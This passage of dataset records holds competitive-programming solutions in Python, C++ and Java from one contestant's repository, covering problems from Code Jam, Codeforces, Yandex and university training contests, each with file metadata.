"text": "n = 2 * 10 ** 5\nq = 10 ** 5\nprint(n, q)\nprint(*list(i for i in range(n)))\nfor i in range(q):\n print(0, n - 5, i % 256, (i + 1) % 256, (i + 2) % 256, (i + 3) % 256)\n" }, { "alpha_fraction": 0.4094216823577881, "alphanum_fraction": 0.602834165096283, "avg_line_length": 24.34951400756836, "blob_id": "3046c739beca3c09281d63075d41e7638aafaa1e", "content_id": "44bf62eaa2746ed4735805562e443263f062b8eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2611, "license_type": "no_license", "max_line_length": 928, "num_lines": 103, "path": "/2013/2013gcj/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <math.h>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define ll long long\n\nusing namespace std;\nint INF = 1000000007;\nconst int size = 48;\nll ans[size] = {\n1ll,\n4ll,\n9ll,\n121ll,\n484ll,\n10201ll,\n12321ll,\n14641ll,\n40804ll,\n44944ll,\n1002001ll,\n1234321ll,\n4008004ll,\n100020001ll,\n102030201ll,\n104060401ll,\n121242121ll,\n123454321ll,\n125686521ll,\n400080004ll,\n404090404ll,\n10000200001ll,\n10221412201ll,\n12102420121ll,\n12345654321ll,\n40000800004ll,\n1000002000001ll,\n1002003002001ll,\n1004006004001ll,\n1020304030201ll,\n1022325232201ll,\n1024348434201ll,\n1210024200121ll,\n1212225222121ll,\n1214428244121ll,\n1232346432321ll,\n1234567654321ll,\n4000008000004ll,\n4004009004004ll,\n100000020000001ll,\n100220141022001ll,\n102012040210201ll,\n102234363432201ll,\n121000242000121ll,\n121242363242121ll,\n123212464212321ll,\n123456787654321ll,\n400000080000004ll};\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint test()\n{\n ll n, m;\n cin >> n >> m;\n return upper_bound(ans, ans + size, m) - lower_bound(ans, ans + size, n);\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%d\\n\", test());\n }\n for (int i = 0; i < size; i++)\n cout << (ll) sqrt(ans[i]) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5188770294189453, "alphanum_fraction": 0.5246853828430176, "avg_line_length": 23.595237731933594, "blob_id": "62ab0d0f85543720cb690bfdf256719f84027a8a", "content_id": "7b5d22649faf357a32c803edc2c86b6a34a7e138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1033, "license_type": "no_license", "max_line_length": 77, "num_lines": 42, "path": "/2021/yandexBackendQual/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "class item:\n def __init__(self, index, start, end, t):\n self.index = index\n self.start = start\n self.end = end\n self.t = t\n\n def __str__(self):\n return f'{self.index},{self.start} {self.end},{self.t}'\n\nitems = []\n\nwhile True:\n try:\n line = input()\n if line == '':\n break\n except:\n break\n index, dates, t = line.split(',')\n index = int(index)\n start, end = dates.split()\n if t == 'NULL':\n items.append(item(index, start, end, 'KGT'))\n items.append(item(index, start, end, 'COLD'))\n items.append(item(index, start, end, 'OTHER'))\n else:\n items.append(item(index, start, end, t))\n\nitems.sort(key = lambda x: [x.index, x.t[1], x.start])\nres = [items[0]]\nn = len(items)\n\nfor i in range(1, n):\n last = res[-1]\n cur = items[i]\n if last.index == cur.index and last.t == cur.t and cur.start <= last.end:\n res[-1].end = max(res[-1].end, cur.end)\n else:\n res.append(cur)\n\nprint(*res, sep = '\\n')\n" }, { "alpha_fraction": 0.4954128563404083, "alphanum_fraction": 0.5321100950241089, "avg_line_length": 26.25, "blob_id": "e060398496570ac876f3b123167681047620cd37", "content_id": "868fd08f12d8d512be045c2775c55ad2ba9dcfd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/2020/bguirQual/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "t = int(input())\nfor i in range(t):\n x = sum(map(int, input().split())) + 1\n print(1 if x > 50 else x)\n" }, { "alpha_fraction": 0.49240341782569885, "alphanum_fraction": 0.5133844614028931, "avg_line_length": 36.35675811767578, "blob_id": "ba12e53e3fef9ed954a7df53df5356d0528dbb2d", "content_id": "d75915cb54b2eb251685956057ec3ae996a34563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6911, "license_type": "no_license", "max_line_length": 174, "num_lines": 185, "path": "/CodeForce/1544/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//modular\ntemplate<typename T = int, T mod = 31607>\nstruct modular\n{\n T value;\n\n modular() : value(0) {}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& other) { value = other % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { *this = modular(den) ^ (mod - 2) * num; }\n template<typename T1> modular& operator^=(T1 const& deg) { modular a(*this); for (T1 n = deg - 1; n > 0; n >>= 1) { if (n & 1) *this *= a; a *= a; } return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value >= mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular& operator/=(modular const& t) { return *this *= ~t; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return modular(*this) *= t; }\n inline modular operator/ (modular const& t) const { return modular(*this) /= t; }\n inline modular operator~ ( ) const { return modular(T(1), value); }\n inline bool operator==(modular const& t) const { return value == t.value; }\n inline bool operator!=(modular const& t) const { return value != t.value; }\n explicit operator T() const { return value; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; if (m.value < 0) m.value += mod; }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<modular<>>> a(n, vector<modular<>>(n));\n readln(a);\n //modular X = 1;\n fori(n)\n forj(n)\n a[i][j] /= 10000;\n //vector<modular<>> p(n + 1, 1);\n //vector<modular<>> q(n + 1, 1);\n //fori(n)\n //{\n //p[0] *= a[i][i];\n //q[0] *= a[i][n - i - 1];\n //forj(n)\n //p[i + 1] *= a[i][j],\n //q[j + 1] *= a[i][j];\n //}\n //modular fastP;\n //modular fastQ;\n //modular d1 = p[0];\n //modular d2 = q[0];\n //FOR(mask, 1, 1 << (n))\n //{\n //int bits = __builtin_popcount(mask);\n //int sign = bits % 2 == 0 ? -1 : 1;\n //modular tempP = 1;\n //modular tempQ = 1;\n //fori(n)\n //if ((1 << i) & mask)\n //tempP *= p[i + 1],\n //tempQ *= q[i + 1];\n //fastP += tempP * sign;\n //fastQ += tempQ * sign;\n //}\n //vector<modular<>> pp = {fastP, fastQ, d1, d2};\n //int m = pp.size();\n //modular fast;\n //FOR(mask, 1, 1 << m)\n //{\n //int bits = __builtin_popcount(mask);\n //int sign = bits % 2 == 0 ? -1 : 1;\n //modular temp = 1;\n //fori(m)\n //if ((1 << i) & mask)\n //temp *= pp[i];\n //fast += temp * sign;\n //}\n\n modular ans;\n int eee = 0;\n FOR(mask, 0, 1 << (n * n))\n {\n vector<vector<int>> b(n, vector<int>(n));\n fori(n)\n forj(n)\n if (mask & (1 << (i * n + j)))\n b[i][j] = 1;\n bool ok = false;\n fori(n)\n {\n int cnt = 0;\n forj(n)\n cnt += b[i][j];\n ok |= cnt == n;\n }\n forj(n)\n {\n int cnt = 0;\n fori(n)\n cnt += b[i][j];\n ok |= cnt == n;\n }\n int cnt = 0;\n fori(n)\n cnt += b[i][i];\n ok |= cnt == n;\n cnt = 0;\n fori(n)\n cnt += b[i][n - i - 1];\n ok |= cnt == n;\n if (ok) {\n eee++;\n modular temp = 1;\n fori(n)\n forj(n)\n if (b[i][j])\n temp *= a[i][j];\n else\n temp *= (modular(1) - a[i][j]);\n ans += temp;\n }\n }\n writeln(ans);\n //writeln(fast, fastP, fastQ, p[0], p[1], modular(7) / 16, X, modular(1) / 16);\n //writeln(fastP + fastQ - fastP * fastQ + X * X);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5414462089538574, "alphanum_fraction": 0.552028238773346, "avg_line_length": 18.55172348022461, "blob_id": "f39ea5e0f2407cc5fb66ab290465cf60219dbe2d", "content_id": "7b0e5deedd9248edacba5dc2483282e734b14309", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 62, "num_lines": 29, "path": "/2023/tin/3.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "# python 3.10\nimport itertools\n\n\nans = set()\nchars = set()\n\ndef get(cc, s, i):\n if s:\n ans.add(s)\n if i == len(cc):\n return\n get(cc, s, i + 1)\n get(cc, s + cc[i], i + 1)\n\n\ndef find_combinations(text: str) -> list[str]:\n for c in text:\n chars.add(c)\n cc = list(chars)\n for xx in itertools.permutations(cc):\n get(xx, '', 0)\n return list(sorted(ans))\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом. \n print(', '.join(find_combinations(input_str)))\n" }, { "alpha_fraction": 0.5282805562019348, "alphanum_fraction": 0.5350678563117981, "avg_line_length": 21.66666603088379, "blob_id": "797c093bcdd6d6ec600a63b34ac26923ad92c9ee", "content_id": "0860b23f09eeddeda72f54a35bb08a8b5bf2bc65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 85, "num_lines": 78, "path": "/2014/gcj2014_0/B.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public QRunnable\n{\n Q_OBJECT\n double C, F, X, i, ans = 0, time = 0;\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> C >> F >> X;\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n out.setRealNumberPrecision(10);\n out << ans << \"\\n\";\n }\n\n void solution()\n {\n i = 2;\n ans = X / i;\n while (true)\n {\n if (C / i + X / (i + F) > X / i)\n break;\n time += C / i;\n i += F;\n ans = min(ans, time + X / i);\n }\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.2768867015838623, "alphanum_fraction": 0.283640056848526, "avg_line_length": 28.07106590270996, "blob_id": "06f69f52ed905d960917d7b9411d0e368ad48411", "content_id": "cb5f581985f9d4bd94e50ecd9e7d3c0af68027aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8486, "license_type": "no_license", "max_line_length": 78, "num_lines": 197, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/E.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class E {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    long[] mul(long[] x, long[] y) {\r\n        long[] z = new long[x.length + y.length + 1];\r\n \r\n        for (int i = 0; i < x.length; i++) {\r\n            for (int j = 0; j < y.length; j++) {\r\n                int k = i + j;\r\n                z[k] += x[i] * y[j];\r\n            }\r\n        }\r\n \r\n        return z;\r\n    }\r\n \r\n    long gcd(long a, long b) {\r\n        return b == 0 ? a : gcd(b, a % b);\r\n    }\r\n \r\n    public void solve() {\r\n        String p = in.next();\r\n        int n = in.nextInt(), m = in.nextInt();\r\n        long[] u = new long[] { 1 }, v = new long[] { 1 };\r\n \r\n        if (p.equals(\"inf\")) {\r\n            for (int i = 0; i < n; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                u = mul(u, new long[] { b, a });\r\n            }\r\n \r\n            for (int i = 0; i < m; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                v = mul(v, new long[] { b, a });\r\n            }\r\n \r\n            for (int i = u.length - 1; i >= -1; i--) {\r\n                if (i == -1 || u[i] != 0) {\r\n                    for (int j = v.length - 1; j >= -1; j--) {\r\n                        if (j == -1 || v[j] != 0) {\r\n                            long a = (i == -1) ? 0 : u[i];\r\n                            long b = (j == -1) ? 0 : v[j];\r\n \r\n                            if (i < j) {\r\n                                out.println(\"0/1\");\r\n                            } else if (i > j) {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n                                out.println(\"inf\");\r\n                            } else {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n \r\n                                a = Math.abs(u[i]);\r\n                                b = Math.abs(v[j]);\r\n \r\n                                long g = gcd(a, b);\r\n \r\n                                out.println((a / g) + \"/\" + (b / g));\r\n                            }\r\n \r\n                            return;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n \r\n        } else {\r\n            long q = Long.parseLong(p);\r\n \r\n            for (int i = 0; i < n; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                u = mul(u, new long[] { b + a * q, a });\r\n            }\r\n \r\n            for (int i = 0; i < m; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                v = mul(v, new long[] { b + a * q, a });\r\n            }\r\n \r\n            for (int i = 0; i <= u.length; i++) {\r\n                if (i == u.length || u[i] != 0) {\r\n                    for (int j = 0; j <= v.length; j++) {\r\n                        if (j == v.length || v[j] != 0) {\r\n                            long a = (i == u.length) ? 0 : u[i];\r\n                            long b = (j == v.length) ? 0 : v[j];\r\n \r\n                            if (i > j) {\r\n                                out.println(\"0/1\");\r\n                            } else if (i < j) {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n                                out.println(\"inf\");\r\n                            } else {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n \r\n                                a = Math.abs(u[i]);\r\n                                b = Math.abs(v[j]);\r\n \r\n                                long g = gcd(a, b);\r\n \r\n                                out.println((a / g) + \"/\" + (b / g));\r\n                            }\r\n \r\n                            return;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n \r\n        }\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new E().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.29821881651878357, "alphanum_fraction": 0.31857505440711975, "avg_line_length": 21.586206436157227, "blob_id": "c2d76b64393dd18628abc273dd4523967015e409", "content_id": "0f08c8d2dd8fc2d79d9f99ebe2230d72f0c67fed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3930, "license_type": "no_license", "max_line_length": 85, "num_lines": 174, "path": "/2013/2013FBHC/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <algorithm>\n#include <cstdlib>\n#include <string>\n#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <iterator>\n#include <queue>\n\nusing namespace std;\n\nint n, k, l, classes;\nvector<int> s, c, c1, head, a, a1, temp, a_1;\n\ntemplate <class T>\nvoid writeln(vector<T> &a)\n{\n for (int i = 0; i < n; i++)\n printf(\"%d \", a[i]);\n// copy(a.begin(), a.end(), ostream_iterator<T>(cout, \" \"));\n printf(\"\\n\");\n}\n\nvoid read(string ss)\n{\n int i = 0;\n char d;\n for (int j = 0; j < ss.size(); j++)\n {\n d = ss[j];\n s[i] = d - 'a' + 1;\n a[i] = i++;\n }\n s[i] = 0;\n a[i] = i++;\n n = i;\n}\n\nvoid radix(vector<int> &a)\n{\n for (int i = 0; i < n; i++)\n head[s[a[i]] + 1]++;\n head[0] = 0;\n for (int i = 1; i < 28; i++)\n head[i] += head[i - 1];\n for (int i = 0; i < n; i++)\n temp[head[s[a[i]]]++] = a[i];\n c[a[0]] = 0;\n classes = 1;\n a = temp;\n for (int i = 1; i < n; i++)\n {\n if (s[a[i]] != s[a[i - 1]])\n classes++;\n c[a[i]] = classes - 1;\n }\n}\n\nvoid suffix_array(vector<int> &s)\n{\n radix(a);\n for (int l = 1; l < n; l *= 2)\n {\n head.clear();\n head.resize(classes, 0);\n for (int i = 0; i < n; i++)\n head[c[a1[i] = (a[i] - l + n) % n]]++;\n for (int i = 1; i < classes; i++)\n head[i] += head[i - 1];\n for (int i = n - 1; i >= 0; i--)\n a[--head[c[a1[i]]]] = a1[i];\n classes = 1;\n c1[a[0]] = 0;\n for (int i = 1; i < n; i++)\n {\n if (c[a[i]] != c[a[i - 1]] || c[(a[i] + l) % n] != c[(a[i - 1] + l) % n])\n classes++;\n c1[a[i]] = classes - 1;\n }\n c = c1;\n }\n}\n\nbool qq(string ss)\n{\n for (int i = 0; i < ss.size(); i++)\n if (ss[i] != 'a' + i)\n return false;\n return true;\n}\n\nint main()\n{\n freopen(\"distinct.out\", \"w+\", stdout);\n //freopen(\"distinct.in\", \"r\", stdin);\n// int m;\n //scanf(\"%d\", &m);\n for (int m = 2; m < 40; m++)\n {\n //cout << m << \"\\n\";\n if (m == 1)\n {\n cout << \"a\\n\";\n return 0;\n }\n\n //cout << m << \"\\n\";\n string ss = \"aa\";\n while (true)\n {\n n = 100;\n\n s.clear();\n c.clear();\n head.clear();\n a.clear();\n a1.clear();\n a_1.clear();\n c1.clear();\n temp.clear();\n\n s.resize(n);\n c.resize(n);\n head.resize(n);\n a.resize(n);\n a_1.resize(n + 1);\n a1.resize(n);\n c1.resize(n);\n temp.resize(n);\n read(ss);\n/// cout << ss << \"\\n\";\n suffix_array(s);\n int z = 0;\n long long ans = 0;\n for (int i = 0; i < n; i++)\n a_1[a[i]] = i;\n int i;\n for (int j = 0; j < n; j++)\n {\n i = a_1[j];\n for (; s[a[i] + z] == s[a[(i + 1) % n] + z]; z++);\n ans = ans + n - 1 - a[i] - z;\n if (z > 0)\n z--;\n }\n// cout << ans << \"\\n\";\n if (ans == m)\n {\n cout << ss << \"\\n\";\n break;\n }\n if (qq(ss))\n {\n int h = ss.size() + 1;\n ss = \"\";\n for (int g = 0; g < h; g++)\n ss.push_back('a');\n }\n else\n {\n if (ss[ss.size() - 1] == ss[ss.size() - 2] + 1)\n {\n int i = ss.size() - 1;\n while (i >= 1 && ss[i - 1] == ss[i] - 1)\n ss[i--] = 'a';\n ss[i]++;\n }\n else\n ss[ss.size() - 1]++;\n }\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.31480762362480164, "alphanum_fraction": 0.3227749764919281, "avg_line_length": 23.273584365844727, "blob_id": "78f2026c9c01868ebef78296e60cdef94e48940a", "content_id": "99c02b1bb51fbf4d842e00ca0884835050c4d92c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5146, "license_type": "no_license", "max_line_length": 78, "num_lines": 212, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/I.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.util.Map.Entry;\nimport java.io.*;\n \npublic class I {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = null;\n \n class Pair {\n int p, n;\n \n Pair(int p, int n) {\n this.p = p;\n this.n = n;\n }\n \n @Override\n public String toString() {\n return \"<\" + p + \" \" + n + \">\";\n }\n }\n \n int m = 500003;\n ArrayList<Integer>[] g = new ArrayList[m];\n int[] size = new int[m];\n \n void dfs(int v) {\n size[v] = 0;\n for (int u : g[v]) {\n dfs(u);\n size[v] += (size[u] + 1);\n }\n }\n \n void mull(Map<Integer, Integer> map, List<Pair> n) {\n for (Pair pair : n) {\n pair\n Integer e = map.get(pair.p);\n if (e == null) {\n e = 0;\n }\n map.put(pair.p, e + pair.n);\n }\n }\n \n public void solve() {\n ArrayList<Pair>[] fac = new ArrayList[m];\n \n for (int i = 0; i < m; i++) {\n g[i] = new ArrayList<Integer>(32);\n fac[i] = new ArrayList<Pair>(32);\n }\n boolean[] p = new boolean[m];\n \n Arrays.fill(p, true);\n p[0] = p[1] = false;\n for (int i = 2; i < m; i++) {\n if (p[i]) {\n for (int j = i * 2; j < m; j += i) {\n p[j] = false;\n }\n }\n }\n \n for (int i = 2; i < m; i++) {\n if (p[i]) {\n fac[i].add(new Pair(i, 1));\n {\n long n = ((long) i) * i;\n int e = 2;\n while (n < m) {\n fac[(int) n].add(new Pair(i, e));\n e++;\n n *= i;\n }\n }\n \n int e = 1;\n long n = i;\n while (n < m) {\n long k = 2;\n while (n * k < m) {\n if (k % i != 0) {\n fac[(int) (n * k)].add(new Pair(i, e));\n }\n ++k;\n }\n ++e;\n n *= i;\n }\n }\n }\n \n // for (int i = 2; i < 20; i++) {\n // System.out.print(i + \" : \");\n // for (Pair pair : fac[i]) {\n // System.out.print(pair + \" \");\n // }\n // System.out.println();\n // }\n \n int[] a = new int[m];\n int t = in.nextInt();\n while (--t >= 0) {\n int n = in.nextInt();\n \n long mod = in.nextInt();\n \n for (int i = 0; i <= n; i++) {\n a[i] = 0;\n }\n \n for (int i = 0; i < n; i++) {\n g[i].clear();\n }\n \n for (int i = 1; i < n; i++) {\n int j = in.nextInt() - 1;\n g[j].add(i);\n }\n \n dfs(0);\n \n for (int i = 2; i < n; i++) {\n for (Pair pair : fac[i]) {\n a[pair.p] += pair.n;\n }\n }\n \n for (int i = 1; i < n; i++) {\n for (Pair pair : fac[size[i] + 1]) {\n a[pair.p] -= pair.n;\n }\n }\n \n long ans = 1;\n \n for (int i = 2; i <= n; i++) {\n long q = 1;\n for (int j = a[i]; j > 0; j--) {\n q = (q * i) % mod;\n }\n ans = (ans * q) % mod;\n }\n \n out.println(ans);\n }\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new I().run();\n }\n}\n" }, { "alpha_fraction": 0.37931033968925476, "alphanum_fraction": 0.3987068831920624, "avg_line_length": 12.285714149475098, "blob_id": "e665cee17243351bfe2bce1046faf9114ef9edab", "content_id": "151dab1d0409f924dbc8c3d519b4e6334e8b853e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 464, "license_type": "no_license", "max_line_length": 38, "num_lines": 35, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/H.cpp", "repo_name": "Igorjan94/CF", 